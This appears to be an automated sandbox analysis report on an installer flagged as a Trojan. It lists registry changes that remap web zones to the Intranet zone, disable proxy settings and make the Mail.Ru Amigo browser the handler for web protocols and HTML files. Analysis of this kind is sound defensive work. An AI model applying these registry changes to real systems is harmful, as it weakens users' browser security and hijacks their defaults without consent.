[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCR\missteer.films]
"(Default)" = "Inst Class"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup9364__14991.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCR\Interface\{A2D515AC-6710-46B8-A864-852CE2F707E6}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKCR\missteer.films.1\CLSID]
"(Default)" = "{c5177071-f77e-4b26-9bc2-b5b7c162af7a}"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKCR\Interface\{A2D515AC-6710-46B8-A864-852CE2F707E6}\TypeLib]
[HKCR\TypeLib\{AFFF9AAC-AEA5-4880-9032-A9587409A2AF}\1.0]
[HKCR\TypeLib\{AFFF9AAC-AEA5-4880-9032-A9587409A2AF}]
[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}]
[HKCR\missteer.films.1\CLSID]
[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\Programmable]
[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\LocalServer32]
[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\Version]
[HKCR\Interface\{A2D515AC-6710-46B8-A864-852CE2F707E6}\ProxyStubClsid]
[HKCR\missteer.films.1]
[HKCR\Interface\{A2D515AC-6710-46B8-A864-852CE2F707E6}]
[HKCR\TypeLib\{AFFF9AAC-AEA5-4880-9032-A9587409A2AF}\1.0\0]
[HKCR\TypeLib\{AFFF9AAC-AEA5-4880-9032-A9587409A2AF}\1.0\0\win32]
[HKCR\Interface\{A2D515AC-6710-46B8-A864-852CE2F707E6}\ProxyStubClsid32]
[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\ProgID]
[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\VersionIndependentProgID]
[HKCR\missteer.films\CurVer]
[HKCR\TypeLib\{AFFF9AAC-AEA5-4880-9032-A9587409A2AF}\1.0\HELPDIR]
[HKCR\missteer.films]
[HKCR\TypeLib\{AFFF9AAC-AEA5-4880-9032-A9587409A2AF}\1.0\FLAGS]
[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\TypeLib]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup9364__14991\DEBUG]
"Trace Level"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCR\CLSID\{c5177071-f77e-4b26-9bc2-b5b7c162af7a}\LocalServer32]
"ServerExecutable"

The process opera_installer_20151219212422.exe:3408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DB 28 23 BE AE 26 28 56 CC 59 0D 2B 02 5B 4C 31"

The process opera_installer_20151219212422.exe:3448 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D A2 3A 98 DB D1 DD C0 5B 50 FF 5D 73 65 4E FD"

The process amigo.exe:2536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""

[HKCU\Software\Amigo\StabilityMetrics]
"user_experience_metrics.stability.exited_cleanly" = "1"

[HKCU\Software\Classes\https]
"URL Protocol" = ""

[HKCU\Software\Classes\.html]
"(Default)" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"

[HKCU\Software\Classes\https\shell]
"(Default)" = "open"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WLanDiagCtlGuid]
"BitNames" = " WLANHC_AUTOCONFIG WLANHC_RNWFMSM WLANHC_FATMSM WLANHC_DLLMAIN WLANHC_TEST"

[HKCU\Software\Amigo]
"metricsid" = "062BF76D-57C9-4DE5-8A63-A12D73533EFD"

[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\ServiceCtlGuid]
"BitNames" = " DOT11_AUTOCONF DOT11_AUTOCONF_CLIENT DOT11_AUTOCONF_UI DOT11_FATMSM DOT11_COMMON DOT11_WLANGPA DOT11_CLASS_COINSTALLER"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\DiagL2SecCtlGuid]
"Guid" = "2e8d9ec5-a712-48c4-8ce0-631eb0c1cd65"

[HKCU\Software\Amigo]
"metricsid_installdate" = "0"

[HKCU\Software\Classes\.shtml]
"(Default)" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Classes\http\shell]
"(Default)" = "open"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\CtlGuid]
"BitNames" = " DOT11_ASSOCIATE DOT11_ROAMING DOT11_1X DOT11_PNP DOT11_SCAN DOT11_RECEIVE DOT11_SEND DOT11_IOCTL DOT11_OID DOT11_MISC DOT11_UPCALL DOT11_KEYMGR DOT11_PEER DOT11_SOFTAP DOT11_PAM DOT11_REPEATER DOT11_APROUTER DOT11_WME DOT11_CONFIG DOT11_MSM DOT11_MSM_ADAPT DOT11_MSM_SCAN DOT11_MSM_CONNECT DOT11_MSM_SECURITY_PKT DOT11_NOTIFY_OBJECT"

[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"

[HKCU\Software\Classes\http]
"URL Protocol" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\CtlGuid]
"Guid" = "d905ac1c-65e7-4242-99ea-fe66a8355df8"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\DiagL2SecCtlGuid]
"BitNames" = " SECHC_LOG_FLAG_ASSERT SECHC_LOG_FLAG_INIT SECHC_LOG_FLAG_DIAG SECHC_LOG_FLAG_ONEX_DIAG SECHC_LOG_FLAG_REPAIR SECHC_LOG_FLAG_STATE SECHC_LOG_FLAG_EXT SECHC_LOG_FLAG_EVENT_LOG SECHC_LOG_FLAG_FUNCTION SECHC_LOG_FLAG_MEMORY SECHC_LOG_FLAG_LOCKS"

[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe -- %1"

[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""

[HKCU\Software\Classes\.xhtml]
"(Default)" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe -- %1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing]
"Active" = "1"

[HKCU\Software\Amigo]
"metricsid_enableddate" = "1450553184"

[HKCU\Software\Classes\.htm]
"(Default)" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D B9 AE 64 73 A3 90 A7 DE 90 F1 FD F0 96 BA 08"

[HKCU\Software\Amigo]
"usagestats" = "1"

[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\ServiceCtlGuid]
"Guid" = "0c5a3172-2248-44fd-b9a6-8389cb1dc56a"

[HKCU\Software\Classes\ftp]
"URL Protocol" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WDiagCoreCtlGuid]
"BitNames" = " WD_LOG_FLAG_INIT WD_LOG_FLAG_RPC WD_LOG_FLAG_EVENT WD_LOG_FLAG_INTERFACE WD_LOG_FLAG_CONNECTION WD_LOG_FLAG_CONTROL WD_LOG_FLAG_LOCKS WD_LOG_FLAG_MEMORY WD_LOG_FLAG_REFERENCES WD_LOG_FLAG_FUNCTION_TRACE WD_LOG_FLAG_ASSERT"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing]
"ControlFlags" = "1"

[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"

[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe -- %1"

[HKCU\Software\Classes\.xht]
"(Default)" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WLanDiagCtlGuid]
"Guid" = "6da4ddca-0901-4bae-9ad4-7e6030bab531"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WDiagCoreCtlGuid]
"Guid" = "637a0f36-dff5-4b2f-83dd-b106c1c725e2"

The process opera_autoupdate.exe:3736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC 29 E9 61 B7 EA 22 9C EA A0 A8 8B 38 79 F8 75"

[HKU\.DEFAULT\Software\Opera Software]
"Attempts" = "1"

The process opera_autoupdate.exe:3572 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 97 AC 0A 20 4B 7A 3D 75 63 54 D6 16 03 F8 E3"

[HKCU\Software\Opera Software]
"Attempts" = "1"
"uuid" = "D8HB0ki2hNruLc/ fXuEPazDN3w2RuwkJdMGZv19C3tTX4eW"
"lut" = "1450553119"

The process launcher.exe:3612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C3 A4 D2 61 44 99 CA AF 6B A4 91 8B B9 AC 33 2E"

The process launcher.exe:2296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 8D DD 27 D4 10 32 EA 1B 92 46 C5 DD 72 3D 51"

The process setup.exe:2672 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Amigo]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\44.4.2403.3\Installer\setup.exe"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"https" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"tel" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo,"

[HKCU\Software\Amigo\Commands\on-os-upgrade]
"CommandLine" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\44.4.2403.3\Installer\setup.exe --on-os-upgrade --verbose-logging"

[HKCR\.webp\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKCR\.xhtml\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Amigo]
"FirstNotDefault" = "Type: REG_QWORD, Length: 8"

"ap" = "-stage:refreshing_policy"

[HKCU\Software\Amigo\Commands\on-os-upgrade]
"AutoRunOnOSUpgrade" = "1"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"AgentInstall" = "0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe"

[HKCU\Software\Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29161}]
"(Default)" = "CommandExecuteImpl Class"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".webp" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Amigo]
"pv" = "44.4.2403.3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"mailto" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities]
"ApplicationIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"

[HKCU\Software\Amigo]
"Name" = "Интернет"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"urn" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"VersionMajor" = "2403"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".htm" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Amigo]
"UninstallArguments" = " --uninstall"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\amigo.exe]
"Path" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"PrevDefault" = "%Program Files%\Opera\launcher.exe -noautoupdate -- %1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"ftp" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCR\.shtml\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"sms" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"ShowIconsCommand" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe --show-icons"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"FirstInstall" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCR\.htm\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"news" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCR\AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe -- %1"

[HKCR\AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ]
"(Default)" = "HTML Document"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"smsto" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".html" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities]
"ApplicationDescription" = "Amigo is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into Amigo."

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"ReinstallCommand" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe --make-default-browser"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"DisplayVersion" = "44.4.2403.3"
"InstallLocation" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application"

[HKCR\AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".xht" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ]
"(Default)" = "Интернет"

[HKCU\Software\Amigo]
"InstallerSuccessLaunchCmdLine" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".shtml" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"http" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\44.4.2403.3\Installer\setup.exe --uninstall"

[HKCU\Software\Amigo]
"InstallerError" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E AE B5 3C 65 0E 23 83 47 CB 0B 96 48 4E AB 8A"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"InstallDate" = "20151219"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"nntp" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29161}\LocalServer32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\44.4.2403.3\delegate_execute.exe"
"ServerExecutable" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\44.4.2403.3\delegate_execute.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Amigo]
"oopcrashes" = "1"

[HKCR\.xht\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKCU\Software\Mail.Ru\AmigoInstaller]
"amigoext" = "eeecheimdlkopnpajfcdmacgkjlkcmji;diciddlabejpoaofdnmoamebeohoiobg;egohihcbmlmdokfdoecjpdiadnkjgmdd;kgkggmpkealihpbjpdmcblcplljamohl;hlnkhcccfccipjdgeddoifmlognfajdp;mbipmajmbfjakbcfnjdldckninlnmhoe;hfpahoblpjopcfnlokmndooidiinhiie;nhhefclnfbjmnbbkhjplpnciolbbbdkd"
"stage" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"webcal" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"Publisher" = "Mail.Ru"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"Guid" = "{4CA87880-A0F6-4A96-A8D8-6DB6A971DA16}"

[HKCU\Software\Amigo]
"InstallerExtraCode1" = "9"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\amigo.exe]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"NoModify" = "1"

[HKCU\Software\Amigo]
"InstallerResult" = "0"

[HKCR\.html\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"mms" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"DisplayName" = "Интернет"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".xhtml" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"NoRepair" = "1"
"Version" = "44.4.2403.3"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"HideIconsCommand" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe --hide-icons"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\Startmenu]
"StartMenuInternet" = "Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities]
"ApplicationName" = "Интернет"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

